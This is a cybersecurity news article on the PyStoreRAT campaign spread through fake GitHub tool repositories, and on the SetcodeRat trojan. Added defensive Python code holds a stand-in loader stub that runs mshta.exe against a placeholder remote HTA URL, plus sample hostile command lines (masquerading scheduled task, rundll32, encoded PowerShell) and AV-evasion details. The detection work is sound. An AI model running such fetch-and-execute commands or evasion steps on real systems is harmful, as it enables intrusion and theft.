PyStoreRAT Malware Payloads Are Spread via Fake OSINT and GPT Utility GitHub Repos


“Recently, a spike in malware spread has come into the spotlight involving OSINT and GPT Utility.”

Cybersecurity experts are drawing attention to a new campaign that uses Python repositories hosted on GitHub to spread PyStoreRAT, a previously undocumented JavaScript-based Remote Access Trojan (RAT).

Yonatan Edri, Morphisec researcher, in the report:

“These repositories, which are sometimes marketed as OSINT tools or development utilities, only have a few lines of code that discreetly download and run a remote HTA file using ‘mshta.exe’.”

Although the identity of the operation’s perpetrator is still unknown, Russian-language artifacts and coding patterns point to a threat actor of Eastern European origin.

“A move toward modular, script-based implants that may deliver various payload forms and adjust to security measures is represented by PyStoreRAT.”

“It establishes a covert first-stage foothold that conventional EDR solutions only identify later in the infection chain thanks to its use of HTA/JS for execution, Python loaders for distribution, and Falcon-aware evasion logic.”

PyStoreRAT, described as a “modular, multi-stage” implant, can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also delivers Rhadamanthys, an information stealer, as a follow-on payload.

Image shows PyStoreRAT Malware

Attack chains use Python or JavaScript loader stubs embedded in GitHub repositories to disseminate the malware under the guise of OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities that are intended to attract developers and analysts.

Mid-June 2025 saw the first indications of the campaign, and since then, a constant flow of “repositories” has been released. In addition to falsely inflating the repositories’ star and fork metrics, a tactic reminiscent of the Stargazers Ghost Network, the tools are advertised on social media sites like YouTube and X.

The threat actors behind the campaign published the repositories from either recently created GitHub accounts or accounts that had been dormant for months. Once the tools gained popularity and appeared on GitHub’s top trending lists, they surreptitiously slipped in the malicious payload in the form of “maintenance” commits in October and November.

In practice, several of the tools did not perform as promised: many merely displayed static menus or non-interactive interfaces, while others carried out only rudimentary placeholder functions.

The operation relied on GitHub’s inherent trust to lend the tools a false sense of legitimacy and trick users into running the loader stub that starts the infection chain.
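The report describes the loader stub as a few lines of Python that hand a remote HTA URL to “mshta.exe”. The following is an added example of how a reviewer could statically triage a Python repository for that shape before running anything from it; it is not Morphisec’s code or the campaign’s. It parses each file with the standard `ast` module and flags process-spawning calls whose string arguments name a LOLBin or a remote `.hta` URL, plus `exec`/`eval` over base64-decoded data. The two inline samples are constructed, and the URL in them is a placeholder, not an indicator from the report.

```python
"""Static triage of Python files for loader-stub indicators (added example)."""
import ast
import re
from dataclasses import dataclass

# Process-spawning calls whose arguments are worth inspecting.
SPAWN_CALLS = {
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_call", "subprocess.check_output",
    "os.system", "os.popen", "os.startfile",
}
LOLBIN_RE = re.compile(r"\b(mshta|rundll32|regsvr32|wscript|cscript)(\.exe)?\b", re.I)
REMOTE_HTA_RE = re.compile(r"https?://\S+\.hta\b", re.I)


@dataclass
class Finding:
    line: int
    reason: str


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _string_constants(node):
    """Yield every string literal nested anywhere under node."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            yield sub.value


def scan_source(src: str) -> list[Finding]:
    """Flag spawn calls that reference a LOLBin or remote .hta, and exec/eval over base64."""
    try:
        tree = ast.parse(src)
    except SyntaxError as exc:
        return [Finding(exc.lineno or 0, "file does not parse as Python")]
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name in SPAWN_CALLS:
            text = " ".join(_string_constants(node))
            lolbin = LOLBIN_RE.search(text)
            if lolbin:
                findings.append(Finding(node.lineno, f"{name} spawns {lolbin.group(1)}"))
            if REMOTE_HTA_RE.search(text):
                findings.append(Finding(node.lineno, f"{name} references a remote .hta URL"))
        elif name in ("exec", "eval"):
            # Second common stub shape: exec/eval over decoded data.
            inner = [_dotted_name(c.func) or "" for c in ast.walk(node) if isinstance(c, ast.Call)]
            if any(n.endswith("b64decode") for n in inner):
                findings.append(Finding(node.lineno, f"{name} over base64-decoded data"))
    return findings


# Constructed samples: a benign CLI and a stub of the shape the report describes.
BENIGN = '''
import argparse, subprocess
def main():
    p = argparse.ArgumentParser(description="whois lookup helper")
    p.add_argument("domain")
    args = p.parse_args()
    subprocess.run(["whois", args.domain], check=False)
'''
STUB = '''
import subprocess
def main():
    print("[*] OSINT toolkit v1.0 - loading modules...")
    subprocess.Popen(["mshta.exe", "https://cdn.example.invalid/update.hta"])
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("stub", STUB)):
        print(label, [(f.line, f.reason) for f in scan_source(src)])
```

Because the check is AST-based rather than a plain text grep, a string split across concatenations or hidden in a list literal is still seen, while the same words in a comment or docstring are not. It is a triage aid, not a verdict: a stub that builds the URL at runtime or calls `ctypes` directly will slip past it.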

This triggers a remote HTML Application (HTA) payload that delivers PyStoreRAT, which can profile the system, check for administrator privileges, and search the system for files related to cryptocurrency wallets, particularly those of Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.

Probably in an effort to lower its visibility, the loader stub enumerates the installed antivirus products and checks for the strings “Falcon” (a reference to CrowdStrike Falcon) or “Reason” (a reference to Cybereason or ReasonLabs).

If either is found, “mshta.exe” is launched via “cmd.exe”; otherwise, “mshta.exe” is executed directly.

Persistence is achieved by creating a scheduled task that poses as an NVIDIA app self-update. In the final phase, the malware contacts an external server to obtain commands to run on the host. The supported commands include the following:

  • Download and run Rhadamanthys and other EXE payloads.
  • Download and extract ZIP archives.
  • Launch a downloaded malicious DLL via “rundll32.exe”.
  • Fetch raw JavaScript code and run it dynamically in memory with eval().
  • Download and install MSI packages.
  • Launch a second “mshta.exe” process to load further remote HTA payloads.
  • Run PowerShell commands straight from memory.
  • Propagate through removable drives by replacing genuine documents with malicious Windows Shortcut (LNK) files.
  • Delete the scheduled task to remove the forensic trail.
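The execution chain above (a script host launching “mshta.exe” with a remote URL, optionally proxied through “cmd.exe” when Falcon or Reason is present, an NVIDIA-themed scheduled task, “rundll32.exe” loading a dropped DLL, in-memory PowerShell, and later deletion of the task) maps onto a few process-creation rules. The block below is an added example, not Morphisec’s detection content, that runs such rules over constructed Sysmon-style records. The field names, the task name, the paths and the URL are assumptions for illustration, not indicators taken from the report.

```python
"""Process-creation rules for the PyStoreRAT execution chain (added example)."""
import re

# User-writable drop locations; a legitimate NVIDIA updater lives under Program Files.
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Public|ProgramData|Downloads)\\", re.I)
URL_RE = re.compile(r"https?://", re.I)
# /tr action that points into Program Files (optionally quoted/escaped).
TR_PROGRAM_FILES_RE = re.compile(r'/tr\s+["\\]*[a-z]:\\program files')
PS_MEMORY_RE = re.compile(r"-e(nc|ncodedcommand)?\b|\biex\b|invoke-expression", re.I)


def _base(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def match_rules(ev: dict) -> list[str]:
    """Return the names of every rule a single process-creation event trips."""
    img, parent, cmd = _base(ev["image"]), _base(ev["parent_image"]), ev["command_line"]
    low = cmd.lower()
    hits = []
    if img == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_hta")
        if parent == "cmd.exe":
            # The loader inserts cmd.exe only when it saw Falcon/Reason installed.
            hits.append("mshta_via_cmd_proxy")
        elif parent in ("python.exe", "pythonw.exe", "wscript.exe", "node.exe"):
            hits.append("mshta_from_script_host")
    if img == "schtasks.exe" and "nvidia" in low:
        if "/create" in low and not TR_PROGRAM_FILES_RE.search(low):
            hits.append("schtask_nvidia_masquerade")
        if "/delete" in low:
            hits.append("schtask_nvidia_removed")
    if img == "rundll32.exe" and USER_WRITABLE_RE.search(cmd):
        hits.append("rundll32_user_writable_dll")
    if img in ("powershell.exe", "pwsh.exe") and PS_MEMORY_RE.search(cmd):
        hits.append("powershell_in_memory")
    return hits


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(event index, rule hits) for every event that trips at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := match_rules(ev))]


# Constructed telemetry, not real indicators. Indices 0-4 model the chain in the
# report; 5 and 6 are benign look-alikes that must not fire.
SYS32 = r"C:\Windows\System32"
EVENTS = [
    {"image": SYS32 + r"\mshta.exe", "parent_image": SYS32 + r"\cmd.exe",
     "command_line": r"mshta.exe https://cdn.example.invalid/update.hta"},
    {"image": SYS32 + r"\schtasks.exe", "parent_image": SYS32 + r"\mshta.exe",
     "command_line": r'schtasks.exe /create /tn "NVIDIA App SelfUpdate" /tr "mshta.exe https://cdn.example.invalid/update.hta" /sc minute /mo 30 /f'},
    {"image": SYS32 + r"\rundll32.exe", "parent_image": SYS32 + r"\mshta.exe",
     "command_line": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\upd.dll,Start"},
    {"image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe", "parent_image": SYS32 + r"\mshta.exe",
     "command_line": r"powershell.exe -nop -enc QUJDREVG"},
    {"image": SYS32 + r"\schtasks.exe", "parent_image": SYS32 + r"\mshta.exe",
     "command_line": r'schtasks.exe /delete /tn "NVIDIA App SelfUpdate" /f'},
    {"image": SYS32 + r"\schtasks.exe", "parent_image": r"C:\Program Files\NVIDIA Corporation\NVIDIA App\NVIDIA app.exe",
     "command_line": r'schtasks.exe /create /tn "NVIDIA App SelfUpdate_1234" /tr "\"C:\Program Files\NVIDIA Corporation\NVIDIA App\NVIDIA app.exe\" --update" /sc daily'},
    {"image": SYS32 + r"\mshta.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]

if __name__ == "__main__":
    for idx, hits in triage(EVENTS):
        print(idx, _base(EVENTS[idx]["image"]), hits)
```

The rules deliberately key on behaviour the report attributes to the chain rather than on hashes or domains, so they survive a re-hosted HTA. The trade-off is the usual one for LOLBin detection: `mshta.exe` with a URL is rare on a managed fleet but not unheard of, so the rules are best combined by parent process (a Python or Node interpreter, or `cmd.exe`, spawning `mshta.exe`) and followed by the task-creation or `rundll32.exe` events within a short window, rather than each alerting on its own.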

The disclosure coincides with Chinese security firm QiAnXin’s description of a new remote access trojan called SetcodeRat, which has probably been spreading across China since October 2025 via malvertising lures.

In just one month, hundreds of computers, including those belonging to businesses and government bodies, were reportedly infected.

QiAnXin Threat Intelligence Center:

“Initially, the malicious installation program would confirm the victim’s location.”

“It will automatically leave if it is not in the Chinese-speaking area.”

Posing as genuine installers for well-known applications such as Google Chrome, the malware advances to the next stage only when the system language matches Mainland China (zh-CN), Hong Kong (zh-HK), Macao (zh-MO), or Taiwan (zh-TW). It also terminates if a connection to a Bilibili URL (“api.bilibili[.]com/x/report/click/now”) fails.

The next step launches a program called “pnm2png.exe” to sideload “zlib1.dll”, which in turn decrypts and executes the contents of a file called “qt.conf”. The decrypted payload is a DLL that embeds the RAT.

SetcodeRat can retrieve instructions and steal data by connecting to a traditional command-and-control (C2) server or Telegram.

The malware can run “cmd.exe”, take screenshots, log keystrokes, read and set directories, start processes, open socket connections, gather system and network connection data, and update itself to a new version.

About The Author

Suraj Koli is a content specialist in technical writing about cybersecurity and information security. He has written many articles on cybersecurity concepts, the latest trends in cyber awareness, and ethical hacking.
